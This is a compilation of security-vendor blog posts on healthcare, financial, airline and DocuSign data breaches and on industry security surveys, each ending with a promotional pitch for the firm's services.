Rush Joins List of Healthcare Providers with Significant Breach

Image Source:

A few weeks back we wrote about Easton Hospital and the lawsuit surrounding their 2014 loss of 4.5 million patients’ personal data.

Monday it was reported that a breach of similar data has occurred at Rush University Medical Center. At an estimated 45,000 records the breach is 100 times smaller than that which occurred at Easton Hospital and that is not the only dramatic difference between the two.

Chinese Hacking vs. Improper Disclosure

In the case of the Easton Hospital breach forensics traced the breach to the malicious efforts of a Chinese hacking group. In the case of Rush, no “hacking” took place. Instead, according to an article on the Chicago Tribune  website, “At Rush, an employee of one of the hospital system’s billing processing vendors improperly disclosed a file to “an unauthorized party,” likely in May 2018, according to a letter sent to affected patients.”

Wall of Shame

The U.S. Department of Health and Human Services Office for Civil Rights breach portal euphemistically referred to as the “wall of shame” points out several interesting things about the state of data security in the healthcare industry.

  • Breaches on the Rise – As compared to the same period during 2018, 2019 is so far on a pace that is more than DOUBLE! (24 vs. 59)
  • Averaging About 1 Medical Related Breach a Day – In the 65 days of 2019 we’ve flipped past on the calendar so far this year there have already been 59 data breaches reported on the wall of shame.
  • Big Breach Small Breach – The number of records disclosed range from as few as 576 (Managed Health Services) to as many as 400,000 (Columbia Surgical Specialist of Spokane)
  • Mainly Attributed to Hacking – 36 of the 59 breaches are attributed to Hacking/IT Incidents with Unauthorized Disclosure (14) and Theft (9) accounting for the majority of the remaining breaches.

Even the Best Security Can be Compromised

At Konsultek we develop world class security solutions that prevent, detect and respond to attempts to breach networks. However, as the Rush breach and the 13 other cases of Unauthorized Disclosure highlight, even world class security solutions can be compromised by inadvertent/malicious activities of employees and sub-contractors.  Ultimately, Network Access Control has to be more than a digital solution. Training, procedures and other management controls must work in concert with IT’s security efforts in order to prevent human powered security incidents.

Forescout® Sets a New Standard for Endpoint Visibility

According to Gartner, by 2023, the average CIO will be responsible for more than three times the endpoints they manage in 2018.
IT say Hello to OT
One of the primary drivers behind this endpoint increase will be the expansion in the number of IoT and OT endpoints. The role of IT is evolving and the IT department, CIOs and CISOs are going to have to become more operational focused in order to effectively manage security in the ever more connected world of business.
Forescout Leading the Way
“We see that the vast majority of this growth is coming from IoT and OT, as well as public and private cloud instances, over traditional IT and corporate managed devices,” said Michael DeCesare, CEO and president, Forescout. “With our latest platform release, Forescout is the only vendor that can offer true device visibility and control across the extended enterprise from IT to OT and scale to two million devices regardless of physical, virtual, cloud or hybrid environments.”
Introducing Forescout 8.1

Forescout 8.1 is the first unified device visibility and control platform for IT and OT networks. Finally, you can have complete situational awareness of all devices on your network and more effectively orchestrate actions to mitigate cyber and operational risk.

Konsultek Knows Forescout
As one of Forescout’s premier partners Konsultek has been helping customers across all industries gain visibility into their endpoints and more effectively control network access for years. So, whether you are looking for a self-managed implementation or a complete hands-off managed security service, Konsultek has the engineering expertise and direct access to Forescout’s top experts to make your endpoint security goals a reality.

Survey Reveals Size Matters When Planning Security Spend

In mid-August 2018 Gartner published its prediction for an 8.7% increase in IT security spending in 2019. This week released its State of IT Security Survey and revealed that when it comes to security spending in 2019, size matters.

Survey Says

Based on their survey, it will be the larger companies that will be primarily driving the 2019 increase in spend while smaller organizations will lag behind.

The vast majority of big spenders in the survey (69 percent) were mid-sized through very large organizations, and their spending lists are long.

By contrast, of the 46 percent of respondents who said their cybersecurity spending will remain flat or down slightly, 62 percent were from companies with fewer than 100 employees, and only a few were from very large companies.

Image Source:

Where Will the Spend be Focused?

According to the survey respondents the majority of the spending will be on proven core security technologies -specifically NAC, web gateways and DLP. This is consistent with what we’re seeing at Konsultek and represents the bedrock of our expertise. Our holistic approach to security solutions is built upon weaving together offerings from leaders in each of these fields such as ForeScout, F5, Forcepoint and Checkpoint.

Are You Prepared?

About 64 percent of respondents said they conduct penetration testing at least annually, and 60 percent conduct threat hunting exercises at the same rate. Do you? Our team of engineers and account executives has the skills and resources to quickly and efficiently determine the vulnerability of your network and offer solutions for any weaknesses found.

If you are interested in getting an outside, independent and unbiased analysis of your network’s security, simply give us a call or click here:

The first 20 respondents will receive a complimentary Executive Risk Assessment. This assessment will not only show you the risk and impact to your most critical digital assets but demonstrate the likelihood of a breach happening.

Easton PA Hospital Getting Close to Settling Breach Lawsuit

Easton, PA is a small town in Pennsylvania’s beautiful Lehigh Valley with a population of just under 30,000. It is probably best known as the home of America’s beloved Crayola crayons.

Image Source: Google Maps

Targeted by Chinese Hackers

It wasn’t Crayola however that Chinese hackers were interested in back in August, 2014 when they executed a cyberattack on another Easton landmark, it was the local hospital. At the time, Easton Hospital was owned by CHS (Community Health Systems) of Franklin, TN. According to Easton Hospital and CHS thieves stole the personal data of some 4.5 million patients including names, birthdates, phone numbers and Social Security numbers.

Lawsuit Pending Approval

Today, nearly 5 years later a host of lawsuits have been consolidated into one larger suit that is about to be settled by a judge in Atlanta. If approved by the judge this August, qualifying victims would be eligible for two types of payments:

  1. Up to $250 for out-of-pocket expenses and documented time lost from the breach.
  2. Up to $5,000 for losses due to identify fraud or identity theft from the cyberattack.

Joining an Ever Growing List maintains a list of notable data breaches to which the Easton breach could potentially be added based upon its scope. Here is the list:

  • Anthem: $115 million
  • Target: $28.5 million ($18.5M for states, $10M for consumers)
  • Home Depot (affected 50 million cardholders): $19.5 million settlement
  • Sony (PlayStation network breach): $15 million
  • Ashley Madison: $12.8 million ($11.6M for consumers, $1.2M for states and the FTC)
  • Sony (employee information breach): $8 million
  • Stanford University Hospital and Clinics: $4.1 million
  • AvMed Inc.: $3.1 million
  • Vendini: $3 million
  • Schnuck Markets: $2.1 million

A Wakeup Call for All Healthcare Providers

This settlement should serve as a wakeup call for all healthcare providers. If only a quarter of the 4.5 million patients receive just the $250 payout the cost to the affected parties would be over $281 million dollars!

Healthcare providers by nature have access to the most sensitive personal data on the planet. You know that, I know that and the cybercriminal element knows that. Because of this we foresee a continued targeting of healthcare providers going forward. From simple information stealing to more elaborate ransomware attacks, healthcare providers need to make certain that their network security is as robust as possible.

How Konsultek Can Help

At Konsultek we eat, sleep and breathe security.

Our team of engineers and account executives has the skills and resources to quickly and efficiently determine the vulnerability of your network and offer solutions for any weaknesses found.

If you are interested in getting an outside, independent and unbiased analysis of your network’s security, simply give us a call or click here:

The first 20 respondents will receive a complimentary Executive Risk Assessment. This assessment will not only show you the risk and impact to your most critical digital assets but demonstrate the likelihood of a breach happening.


Mortgage and Loan Data Leaked Twice

7 days ago Techcrunch revealed that independent security researcher Bob Diachenko had found 24 million financial and banking documents exposed to the world as a result of a server security flaw. Considering the type of data exposed – loan documents, sensitive financial and tax documents – this was a significant and very serious breach.

“These documents contained highly sensitive data, such as Social Security numbers, names, phones, addresses, credit history and other details which are usually part of a mortgage or credit report,” Diachenko told TechCrunch. “This information would be a gold mine for cyber criminals who would have everything they need to steal identities, file false tax returns, get loans or credit cards.”

The leaked documents were OCR (Optical Character Recognition) files and while the compromised server was immediately shut down once the security flaw was identified there is no telling how many cybercriminals might have already accessed the files.

Who’s at Fault?

After working through the various parties involved it appears that the source of the breach was the machine learning firm OpticsML. Which according to their website (now offline) “will automate the page indexing and data extraction process entirely. Different from traditional OCR companies, Optics Machine Learning trains computers to read and understand documents like a human, enabling an 80% reduction in labor needs alongside higher levels of accuracy so your analysts can focus on higher level tasks.”

Same Documents Released AGAIN!

In a surprising “you can’t make this stuff up” twist on this already monumental breach, the following day Dianchenko found the original loan documents on an “easy to guess” web address on an Amazon AWS server without so much as simple password protection! Considering that Amazon AWS storage servers have a default privacy setting of “private” it seems that someone either accidentally or consciously set the permissions to public.

While this may not end up being the largest data breach of 2019, with more than 11 months left in the year it surely has secured its place in the top 10 most significant breaches by virtue of the fact that the same information was exposed twice in two different formats on completely different storage networks.

Security On Your Mind?

At Konsultek we eat, sleep and breathe security. If you are interested in getting an outside, independent and unbiased analysis of your network’s security simply give us a call or click here  First 20 that click thru get a complimentary Executive Risk Assessment. This assessment will not only show you risk and impact to your most critical digital assets but demonstrate the likelihood of a breach happening.  Our team of engineers and account executives has the skills and resources to quickly and efficiently determine the vulnerability of your network and offer solutions for any weaknesses found.

2018 HIMSS Cybersecurity Survey Findings

The 2018 HIMSS Cyber Security Survey has been released and it’s a “must read” for anyone in the healthcare security space.

Most Respondents Have Had a Significant Security Incident

An overwhelming 75% of survey respondents indicated that their organization had experienced a significant security incident in the past 12 months. It is unfortunate that the 2017 survey did not include this question for comparison purposes so it is impossible to tell whether the respondents would have indicated this is an increase or decrease over 2017.

Image Source: 2018 HIMSS Cybersecurity Survey

Phishing and Negligence are Top Threat Actors

37.6% of respondents identified “online scam artists” such as though behind phishing and spear phishing campaigns as the #1 threat actor in 2018. Next in line? “Negligent insiders” at 20.8%.  Negligent Insiders are defined as well-meaning but negligent individuals with trusted access that inadvertently may facilitate a breach.

E-mail Dominates as the Initial Point of Compromise

While this is no surprise given the #1 position of “online scam artists” cited above, the attribution of phishing emails as the starting point for 61.9% of all significant security events was higher than expected. This strongly suggests that in addition to robust network security detection and containment solutions healthcare providers should also be investing to create a culture of security through employee training.

More Resources Being Allocated to Cybersecurity

If there is a bright spot in the survey it is certainly that healthcare organizations as a whole (83.4%) are allocating more resources to cybersecurity. This is good news since 2018 saw cybercriminals increasing their focus on healthcare and other high profile industries that have deep pockets and a low threshold of pain.

The Cure for Your Cyber Security Pain

Konsultek knows healthcare security. Organizations both small and large trust their network security to our customized solutions and holistic approach. If you are experiencing the symptoms of a cybersecurity illness it may be time to schedule an appointment with one of our specialists.  From executive assessments to penetration testing we have the knowhow and experience to identify and cure what ails you.

Navy Responds to Cyber Breaches with Research Solicitation

Navy Responds to Cyber Breaches with Research Solicitation

Back in December we covered the Navy’s alarming revelation that significant cyber breaches had occurred over the prior 18 months.


Corrective Actions Already Underway

Last week NAVAIR updated their Resilient Cyber Warfare Capabilities for NAVAIR Weapon Systems solicitation. This solicitation, originally issued July 6, 2018 seeks research support technologies that are applicable to making the NAVAIR Weapon Systems more resilient to cyber-attack. It’s good to know that NAVAIR has already been making efforts to take corrective actions after the October 2018 GAO Study found that some of the most sophisticated weapons systems were vulnerable to relatively simplistic attacks.

3 Pillars of Interest

According to an article on NAVAIR is planning to better protect its systems moving forward by improving its capabilities in 3 areas.

  1. Dynamic Reconfiguration – when a network makes “changes to router rules, access control lists, intrusion detection/prevention system parameters, and filter rules for firewalls and gateways.” – as defined by NIST.
  2. Deception Tactics – “Leveraging classical denial and deception techniques to understand the specifics of adversary attacks enables an organization to build an active, threat-based cyber defense,” – according to researchers at MITRE.
  3. Artificial Intelligence – “We see that the more we automate our networks and the more we use machines to do the heavy lifting, the better. Our brains do not have the intellectual capacity to process all of that information,” – Rear Adm. Danelle Barrett, Navy Cyber Security Division Director.

Mirrors Konsultek’s Approach

What does protecting NAVAIR weapons systems and protecting your network have in common? In both cases a dynamic, holistic approach to security is needed. At Konsultek our custom security solutions defend, detect and secure networks against attacks from all manner of threat vectors. When you’re ready to take the next step in advanced network protection, give us a call to learn more.

Is Automation the Key to Lower Incident Response Times?

This year’s SANS Endpoint Security Survey report is loaded with interesting statistics such as:

  • 42% of IT professionals acknowledged they had suffered a breach on their endpoints.
  • 20% said they did not know if they had been breached.
  • 82% of those that knew of a breach said it had involved a desktop.
  • 69% cited corporate laptops.
  • 42% cited employee-owned laptops.
  • 47% of antivirus capabilities detected threats.
  • 26% of breaches were detected by endpoint detection and response (EDR) capabilities.

It was this last response that was of particular interest, so we took a deeper dive.

Endpoints Up Response Times Down

One of the challenges facing security professionals is the seemingly ever expanding number of endpoints that need to be monitored. It’s akin to having an ever expanding fence line that needs to be patrolled and maintained by a rancher to prevent loss of livestock to predators.


Interestingly enough, despite the growth in endpoints this year’s report showed that incident response times are actually decreasing. One of the primary reasons for this is automated endpoint detections and response capabilities (EDR).

Are you Automated?


If you have purchased and fully implanted a next-gen EDR solution you can consider yourself and your organization firmly ahead of the curve.  As SANS Analyst and survey author Lee Neely states in the report:


“The diversity and quantity of endpoints in the modern enterprise are driving the need for more automation and predictive capabilities. While [organizations] are purchasing solutions to keep ahead of the emerging cyber threats, they appear to fall short on implementing the key purchased capabilities needed to protect and monitor the endpoint.”

In fact, to be more specific:

“Of the IT professionals that had acquired next-gen endpoint security solutions, 37% haven’t implemented their full capabilities”.

Let Konsultek Help You Automate

The SANS Incident Response Survey shows that the largest number of respondents had a “time to detect” between 6-24 hours, “time to contain” of 2-7 days and  finally a “time to remediate” of 2-7 days.  As security professionals looking to secure an ever more complex end-point “fence line” how do we accelerate the incident response time? The obvious answer is to use machine based automation.

Curious as to how that might work in your organization’s network? We’d be happy to explain! Just give us a call to discuss how a Konsultek custom security solution can take your organization to a whole new level of security.


22Line Code “Scalpel” to Removes British Airways Customer Data

A couple weeks ago British Airways confirmed that the personal data of 380,000 customers had been stolen.

Magecart Again. Still?

On September 11th the simplicity of this surgical strike was revealed by RiskIQ and the details are pretty amazing. According to RiskIQ the incident, which lasted 15 days, was very similar to the breach of Ticket Master UK earlier in the year. That similarity combined with crawl data allowed them to quickly confirm that the threat actors were one in the same, Magecart.

Magecart is a group of criminals that specialize in web based credit card skimmers. RiskIQ actively monitors 2 billion pages of the world wide web for Magecart activity and Magecart is so active that RiskIQ gets hourly notifications of sites being hacked!

The 22 Line Scalpel

In the case of the British Airways hack, Magecart slightly modified their code so it went unnoticed by the RiskIQ automated crawlers and only after the fact could RiskIQ manually identify their handiwork. It turned out that the 22 lines of javascript shown below is what excised the personal data of 380,000 customers.

The same code also appears to have affected the British Airways mobile app for the same period of time. This is because the app was developed as an empty shell that simply pulled in functionality from the desktop site. While past Magecart attacks grabbed form data indiscriminately, these 22 lines were highly targeted, extracting payment information and sending it off to their own servers.

Konsultek Knows Security

Threat prevention, detection and quarantine are the hallmarks of a robust security solution. If your current approach to network security is a patchwork quilt of boxes and software that has been cobbled together over time it’s probably time to have us perform a comprehensive review. Simply give us a call and we’ll schedule a time to chat. It’s really that easy to get started.

While WannaCry is Making Headlines Docusign Breach Quietly Endangers Users

Rather than write the 1000th post about WannaCry (although our Partners at Proofpoint, their Engineer Darien Huss and a fellow called MalwareTech deserve a serious shout-out from the world for stopping WannaCry) I decided to cover something with potentially huge financial implications that has virtually gone under the radar by comparison.

While WannaCry was grabbing the cybersecurity headlines for the week, it turns out that online signature giant DocuSign was more quietly and in a rather methodical fashion, publicly disclosing the details of a significant and serious cyberbreach themselves.

Here’s an abbreviated timeline of what we know so far from DocuSign themselves.

Update 5/9/2017 – Malicious Email Campaign

DocuSign is tracking a malicious email campaign where the subject reads: “Completed: – Wire Transfer Instructions for recipient-name Document Ready for Signature”.

The email contains a link to a downloadable Word Document which is designed to trick the recipient into running what’s known as macro-enabled-malware.

Update 5/15/2017 – Malicious Email Campaign

DocuSign is tracking a malicious email campaign where the subject reads: Completed *company name* – Accounting Invoice *number* Document Ready for Signature;The email contains a link to a downloadable Word Document which is designed to trick the recipient into running what’s known as macro-enabled-malware.

These emails are not associated with DocuSign. They originate from a malicious third-party using DocuSign branding in the headers and body of the email. The emails are sent from non-DocuSign-related domains including Legitimate DocuSign signing emails come from or email addresses.

Update 5/15/2017 – Latest update on malicious email campaign

Last week and again this morning, DocuSign detected an increase in phishing emails sent to some of our customers and users – and we posted alerts here on the DocuSign Trust Site and in social media. The emails “spoofed” the DocuSign brand in an attempt to trick recipients into opening an attached Word document that, when clicked, installs malicious software. As part of our process in response to phishing incidents, we confirmed that DocuSign’s core eSignature service, envelopes and customer documents remain secure.

However, as part of our ongoing investigation, today we confirmed that a malicious third party had gained temporary access to a separate, non-core communication system used for service-related announcements that contained a list of email addresses. A complete forensic analysis has confirmed that only email addresses were accessed; no names, physical addresses, passwords, social security numbers, credit card data or other information was accessed. No content or any customer documents sent through DocuSign’s eSignature system was accessed; and DocuSign’s core eSignature service, envelopes and customer documents and data remain secure.

Update 5/16/2017 @ 8:55 Pacific Time – Key Update on Malicious Campaign

Q: Have the email addresses of my employees, customers or customers’ customers been exposed as part of this incident?
A: As part of our ongoing investigation, we can now confirm that no signers were on the list of email addresses that was accessed maliciously unless they had signed up for a DocuSign account. That could include direct DocuSign customers; someone who signed a document and elected to open a DocuSign account; or someone who signed up for a DocuSign freemium account – via, through a partner integration, or via the DocuSign mobile client.

Update 5/17/2017 @ 1:02 PM Pacific Time – New Phishing Campaign Discovered Today

DocuSign has observed a new phishing campaign that began the morning of May 16 (Pacific Time). The email comes from “” with the subject “Legal acknowledgement for <person> Document is Ready for Signature” and it contains a link to a malicious, macro-enabled Word document. We suggest you do not open this email, but rather delete it immediately.

The Ultimate Phishing Scam?

This may very well be the ultimate spear phishing campaign. While the number of email addresses compromised has not been disclosed, we can assume it is A LOT and a considerable portion of those affected routinely use DocuSign multiple times a month, if not weekly or daily. Since DocuSign emails are both expected and “trusted” we can only further assume that these phishing campaigns are being effective. No official report on just how effective, so far, but perhaps we’ll get an update further details emerge.

It seems likely that this scam will continue for a very long time given that DocuSign reportedly has 100 million users.

The Lesson You Can Learn

“However, as part of our ongoing investigation, today we confirmed that a malicious third party had gained temporary access to a separate, non-core communication system used for service-related announcements that contained a list of email addresses.” (Emphasis added)

The lesson to be learned here is that in today’s world no part of your network can be considered “non-core” when it comes to security. If the data is worth saving within your network, it is worth protecting!

Konsultek and Its Partners

Konsultek and its partners like Proofpoint, CheckPoint, ForeScout, CarbonBlack and many others work together to build custom security solutions for businesses of all sizes in all markets. When you’re ready to learn about your network vulnerabilities and how to correct them please give us a call.


© Copyright 2018 Konsultek